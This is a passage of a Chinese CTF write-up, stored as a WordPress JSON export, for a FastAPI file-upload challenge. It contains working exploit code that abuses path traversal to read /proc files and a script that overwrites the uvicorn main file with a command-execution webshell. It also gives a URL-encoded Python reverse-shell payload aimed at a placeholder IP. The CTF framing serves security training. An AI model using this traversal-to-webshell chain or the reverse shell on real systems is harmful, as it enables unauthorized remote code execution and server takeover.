\"422\": {\n            \"description\": \"Validation Error\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {\n                  \"$ref\": \"#\/components\/schemas\/HTTPValidationError\"\n                }\n              }\n            }\n          }\n        }\n      }\n    },\n    \"\/uploads\/{fileIndex}\": {\n      \"get\": {\n        \"summary\": \"Download File\",\n        \"operationId\": \"download_file_uploads__fileIndex__get\",\n        \"parameters\": [\n          {\n            \"name\": \"fileIndex\",\n            \"in\": \"path\",\n            \"required\": true,\n            \"schema\": {\n              \"type\": \"string\",\n              \"title\": \"Fileindex\"\n            }\n          }\n        ],\n        \"responses\": {\n          \"200\": {\n            \"description\": \"Successful Response\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {}\n              }\n            }\n          },\n          \"422\": {\n            \"description\": \"Validation Error\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {\n                  \"$ref\": \"#\/components\/schemas\/HTTPValidationError\"\n                }\n              }\n            }\n          }\n        }\n      }\n    },\n    \"\/list\": {\n      \"get\": {\n        \"summary\": \"List File\",\n        \"operationId\": \"list_file_list_get\",\n        \"responses\": {\n          \"200\": {\n            \"description\": \"Successful Response\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {}\n              }\n            }\n          }\n        }\n      }\n    },\n    \"\/\": {\n      \"get\": {\n        \"summary\": \"Index\",\n        \"operationId\": \"index__get\",\n        \"responses\": {\n          \"200\": {\n            \"description\": \"Successful Response\",\n            \"content\": {\n              \"application\/json\": {\n                \"schema\": {}\n              }\n            }\n          }\n        }\n      }\n    }\n  },\n  \"components\": {\n    \"schemas\": {\n      \"Body_upload_file_upload__post\": {\n        \"properties\": {\n          \"file\": {\n            \"type\": \"string\",\n            \"format\": \"binary\",\n            \"title\": \"File\"\n          }\n        },\n        \"type\": \"object\",\n        \"required\": [\n          \"file\"\n        ],\n        \"title\": \"Body_upload_file_upload__post\"\n      },\n      \"HTTPValidationError\": {\n        \"properties\": {\n          \"detail\": {\n            \"items\": {\n              \"$ref\": \"#\/components\/schemas\/ValidationError\"\n            },\n            \"type\": \"array\",\n            \"title\": \"Detail\"\n          }\n        },\n        \"type\": \"object\",\n        \"title\": \"HTTPValidationError\"\n      },\n      \"ValidationError\": {\n        \"properties\": {\n          \"loc\": {\n            \"items\": {\n              \"anyOf\": [\n                {\n                  \"type\": \"string\"\n                },\n                {\n                  \"type\": \"integer\"\n                }\n              ]\n            },\n            \"type\": \"array\",\n            \"title\": \"Location\"\n          },\n          \"msg\": {\n            \"type\": \"string\",\n            \"title\": \"Message\"\n          },\n          \"type\": {\n            \"type\": \"string\",\n            \"title\": \"Error Type\"\n          }\n        },\n        \"type\": \"object\",\n        \"required\": [\n          \"loc\",\n          \"msg\",\n          \"type\"\n        ],\n        \"title\": \"ValidationError\"\n      }\n    }\n  }\n}<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u5b9a\u4e49\u4e86\u56db\u4e2aAPI\u8def\u5f84<\/p>\n\n\n\n
\/upload\/\uff1a\u4e0a\u4f20\u6587\u4ef6\uff0c\u4f7f\u7528 POST \u65b9\u6cd5\uff0c\u5e76\u63a5\u53d7\u4e00\u4e2a multipart\/form-data \u7c7b\u578b\u7684\u8bf7\u6c42\u4f53\uff0c\u5176\u4e2d\u5305\u542b\u4e00\u4e2a\u540d\u4e3a file \u7684\u6587\u4ef6\u5bf9\u8c61\u3002\n\/uploads\/{fileIndex}\uff1a\u4e0b\u8f7d\u6587\u4ef6\uff0c\u4f7f\u7528 GET \u65b9\u6cd5\uff0c\u5e76\u63a5\u53d7\u4e00\u4e2a\u540d\u4e3a fileIndex \u7684\u8def\u5f84\u53c2\u6570\uff0c\u8868\u793a\u8981\u4e0b\u8f7d\u7684\u6587\u4ef6\u7684\u7d22\u5f15\u3002\n\/list\uff1a\u5217\u51fa\u6240\u6709\u5df2\u4e0a\u4f20\u7684\u6587\u4ef6\uff0c\u4f7f\u7528 GET \u65b9\u6cd5\u3002\n\/\uff1a\u6839\u8def\u5f84\uff0c\u4f7f\u7528 GET \u65b9\u6cd5\u3002<\/code><\/pre>\n\n\n\n
\u6d4b\u8bd5\u811a\u672c\uff1a<\/p>\n\n\n\n
import requests\nimport re\n\nurl = \"http:\/\/2df4b7ed-e862-4d5d-89ff-6e19c9610d4d.challenge.ctf.show\/\"\nname = \"fushuling\"\nresponse = requests.post(\n        url=url+\"upload\/\",\n        files={\"file\":(name, \"fushuling\")}\n    )\nprint(response.text)\nfileIndex=re.search(r'\"fileName\":\"([^\"]+)\"', str(response.text)).group(1)\n# print(fileIndex)\nresponse = requests.get(\n        url=url+\"uploads\/\"+fileIndex\n    )\nprint(response.text)\n'''\n{\"fileName\":\"7ed7d072-7526-403a-98c3-b422698426f4\"}\n{\"fileName\":\"7ed7d072-7526-403a-98c3-b422698426f4\",\"fileContent\":\"fushuling\"}\n'''<\/code><\/pre>\n\n\n\n
\u8fd9\u91cc\u731c\u6d4b\u9898\u76ee\u4f7f\u7528\u4e86os.path.join\u8fdb\u884c\u4e86\u8def\u5f84\u62fc\u63a5\uff0c\u5b58\u5728\u8def\u5f84\u7a7f\u8d8a\uff0c\u6211\u4eec\u53ef\u4ee5\u628a\u672c\u6765\u670d\u52a1\u5668\u4e0a\u7684\u6587\u4ef6\u4f20\u4e0a\u53bb\u7136\u540e\u8bfb\uff0c\u8fd9\u6837\u5c31\u6709\u4efb\u610f\u6587\u4ef6\u8bfb\u53d6<\/p>\n\n\n\n
import requests\nimport re\n\nurl = \"http:\/\/2df4b7ed-e862-4d5d-89ff-6e19c9610d4d.challenge.ctf.show\/\"\n\ndef upload(name):\n    response = requests.post(\n            url=url+\"upload\/\",\n            files={\"file\":(name, \"fushuling\")}\n        )\n    print(response.text)\n    fileIndex=re.search(r'\"fileName\":\"([^\"]+)\"', str(response.text)).group(1)\n    # print(fileIndex)\n    response = requests.get(\n        url=url+\"uploads\/\"+fileIndex\n    )\n    print(response.text)\n\nfor pid in range(20):\n        filename = f'\/proc\/{pid}\/cmdline'\n        # filename = \"\/proc\/1\/cmdline\"\n        upload(filename)<\/code><\/pre>\n\n\n\n
\u8bfb\u51fa\u6765\u5f53\u524d\u5de5\u4f5c\u76ee\u5f55\u662f\/ctfshowsecretdir\uff0cuvicorn\u4e3b\u6587\u4ef6\u540d\u4e3actfshow2024secret\uff0c\u6240\u4ee5\u6211\u4eec\u77e5\u9053\u5f53\u524d\u8fd9\u4e2a\u5e94\u7528\u6587\u4ef6\u5176\u5b9e\u5c31\u5728\/ctfshowsecretdir\/ctfshow2024secret.py\uff0c\u6211\u4eec\u53ef\u4ee5\u5199\u4e00\u4e2aapi\u6728\u9a6c\uff0c\u8986\u76d6\u4e3b\u7a0b\u5e8f\uff0c\u540d\u5b57\u4e0d\u80fd\u53d8\u7136\u540e\u91cd\u8f7d\uff0c\u8fd9\u6837\u5c31\u80fdRCE\uff0c\u5b98\u65b9\u811a\u672c\uff1a<\/p>\n\n\n\n
#-*- coding : utf-8 -*-\n# coding: utf-8\nimport time\nimport requests\nimport io,json\n\nurl = \"http:\/\/xxxx\/\"\napp = ''\n# Author:ctfshow-h1xa\n\ndef get_api():\n    response = requests.get(url=url+\"openapi.json\")\n    if \"FastAPI\" in response.text:\n        apijson = json.loads(response.text)\n    return apijson\n    \n    \n\ndef get_pwd():\n    pwd = ''\n    for pid in range(20):\n        data = f'\/proc\/{pid}\/environ'\n        file = upload(data)\n        content = download(file['fileName'])\n        if content['fileName'] and 'PWD' in content['fileContent']:\n            pwd = content['fileContent'][content['fileContent'].find(\"PWD=\")+4:content['fileContent'].find(\"GPG_KEY=\")]+'\/'\n            break\n    return pwd\n\ndef get_python_file():\n    python_file = ''\n    for pid in range(20):\n        data = f'\/proc\/{pid}\/cmdline'\n        file = upload(data)\n        content = download(file['fileName'])\n        if content['fileName'] and 'uvicorn' in content['fileContent']:\n            if 'reload' in content['fileContent']:\n                print(\"[\u221a] \u68c0\u6d4b\u5230\u5b58\u5728reload\u53c2\u6570\uff0c\u53ef\u4ee5\u8fdb\u884c\u70ed\u90e8\u7f72\")\n                python_file = content['fileContent'][content['fileContent'].find(\"uvicorn\")+7:content['fileContent'].find(\":\")]+\".py\"\n                print(f\"[\u221a] \u68c0\u6d4b\u5230\u4e3b\u7a0b\u5e8f\uff0c{python_file}\")\n                global app\n                app = content['fileContent'][content['fileContent'].find(\"uvicorn\")+7+len(python_file)-3+1:content['fileContent'].find(\"--\")]\n                print(f\"[\u221a] \u68c0\u6d4b\u5230uvicorn\u7684\u5e94\u7528\u540d\uff0c{app}\")\n            else:\n                print(\"[x] \u68c0\u6d4b\u5230\u65e0reload\u53c2\u6570\uff0c\u65e0\u6cd5\u70ed\u90e8\u7f72\uff0c\u7a0b\u5e8f\u7ed3\u675f\")\n                exit()\n            break\n    return python_file\n\ndef new_file():\n    global app\n    return f'''\nimport uvicorn,os\nfrom fastapi import *\n{app} = FastAPI()\n\n@{app}.get(\"\/s\")\ndef s(c):\n  os.popen(c)\n'''.replace(\"\\x00\",\"\")\n\ndef get_shell(name):\n    name = name.replace(\"\\x00\",\"\")\n    response = requests.post(\n            url=url+\"upload\/\",\n            files={\"file\":(name, new_file())}\n        )\n    if 'fileName' in response.text:\n        print(f\"[\u221a] \u4e0a\u4f20\u6210\u529f\uff0c\u7b49\u5f855\u79d2\u91cd\u8f7d\u4e3b\u7a0b\u5e8f \")\n        for i in range(5):\n            time.sleep(1)\n            print(\"[\u221a] \"+str(5-i)+\" \u79d2\u540e\u9a8c\u8bc1\u91cd\u8f7d\")\n    else:\n        print(\"[x] \u4e3b\u7a0b\u5e8f\u91cd\u5199\u5931\u8d25\uff0c\u7a0b\u5e8f\u9000\u51fa\")\n        exit()\n    try:\n        response = requests.get(url=url+'s\/?c=whoami', timeout=3)\n    except:\n        print(\"[x] \u4e3b\u7a0b\u5e8f\u91cd\u8f7d\u5931\u8d25\uff0c\u7a0b\u5e8f\u9000\u51fa\")\n        exit()\n    if response.status_code == 200:\n        print(f\"[\u221a] \u606d\u559c\uff0cgetshell\u6210\u529f \u8def\u5f84\u4e3a{url}s\/ \")\n    else:\n        print(\"[x] \u4e3b\u7a0b\u5e8f\u91cd\u8f7d\u5931\u8d25\uff0c\u7a0b\u5e8f\u9000\u51fa\")\n        exit()\n\ndef upload(name):\n    f = io.BytesIO(b'a' * 100)\n    response = requests.post(\n            url=url+\"upload\/\",\n            files={\"file\":(name, f)}\n        )\n    if 'fileName' in response.text:\n        data = json.loads(response.text)\n        return data\n    else:\n        return {'fileName':''}\n\ndef download(file):\n    response = requests.get(url=url+\"uploads\/\"+file)\n    if 'fileName' in response.text:\n        data = json.loads(response.text)\n        return data\n    else:\n        return {'fileName':''}\n\ndef main():\n    print(\"[\u221a] \u5f00\u59cb\u8bfb\u53d6openapi.json\")\n    apijson = get_api()\n    print(\"[\u221a] \u5f00\u653eapi\u6709\")\n    print(*apijson['paths'])\n    print(\"[\u221a] \u5f00\u59cb\u8bfb\u53d6\u8fd0\u884c\u76ee\u5f55\")\n    pwd = get_pwd()\n    if pwd:\n        print(f\"[\u221a] \u8fd0\u884c\u76ee\u5f55\u8bfb\u53d6\u6210\u529f \u8def\u5f84\u4e3a{pwd}\")\n    else:\n        print(\"[x] \u8fd0\u884c\u8def\u5f84\u8bfb\u53d6\u5931\u8d25\uff0c\u7a0b\u5e8f\u9000\u51fa\")\n        exit()\n    python_file = get_python_file()\n    if python_file:\n        print(f\"[\u221a] uvicorn\u4e3b\u6587\u4ef6\u8bfb\u53d6\u6210\u529f \u8def\u5f84\u4e3a{pwd}{python_file}\")\n    else:\n        print(\"[x] uvicorn\u4e3b\u6587\u4ef6\u8bfb\u53d6\u5931\u8d25\uff0c\u7a0b\u5e8f\u9000\u51fa\")\n        exit()\n    get_shell(pwd+python_file)\n\nif __name__ == \"__main__\":\n    main()<\/code><\/pre>\n\n\n\n
\u8fd9\u4e2a\u5c0f\u9a6c\u6267\u884c\u547d\u4ee4\u6ca1\u6709\u56de\u663e\uff0c\u7528python\u5f39shell\u5373\u53ef<\/p>\n\n\n\n
url\/s?c=python%20-c%20%22import%20os%2Csocket%2Csubprocess%3Bs%3Dsocket.socket(socket.AF_INET%2Csocket.SOCK_STREAM)%3Bs.connect(('x.x.x.x'%2C9383))%3Bos.dup2(s.fileno()%2C0)%3Bos.dup2(s.fileno()%2C1)%3Bos.dup2(s.fileno()%2C2)%3Bp%3Dsubprocess.call(%5B'%2Fbin%2Fbash'%2C'-i'%5D)%3B%22<\/code><\/pre>\n\n\n\n
\u5b98\u65b9wp\u94fe\u63a5CTFshow\u5143\u65e6\u6c34\u53cb\u8d5b\u5b98\u65b9WP<\/a>\uff0c\u5199\u7684\u6ca1\u6709\u6211\u8be6\u7ec6\uff0c\u4f46\u6211\u4e5f\u662f\u8ddf\u7740\u4ed6\u7684\u601d\u8def\u5199\u7684\uff0c\u6240\u4ee5\u8fd8\u662f\u5efa\u8bae\u770b\u770b\u5b98\u65b9wp\u3002\u8fd1\u6765\u56e0\u4e3a\u4e00\u4e9b\u4e8b\u610f\u5fd7\u6d88\u6c89\u4e86\u5f88\u4e45\uff0c\u8fd8\u597d\u7f13\u8fc7\u6765\u4e86\uff0c\u5e0c\u671b\u4ee5\u540e\u80fd\u505a\u66f4\u591a\u6709\u610f\u4e49\u7684\u4e8b\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"
easy_include \u5305\u542bsession easy_web \u62c6\u5f00\u770b\uff0c\u628awaf\u5565\u7684\u90fd\u5148\u4e0d\u770b\uff0c\u5173\u952e\u662f\u89e6\u53d1\u5230Ch […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-3092","post","type-post","status-publish","format-standard","hentry","category-6"],"_links":{"self":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3092","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/comments?post=3092"}],"version-history":[{"count":33,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3092\/revisions"}],"predecessor-version":[{"id":3324,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/posts\/3092\/revisions\/3324"}],"wp:attachment":[{"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/media?parent=3092"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/categories?post=3092"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fushuling.com\/index.php\/wp-json\/wp\/v2\/tags?post=3092"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}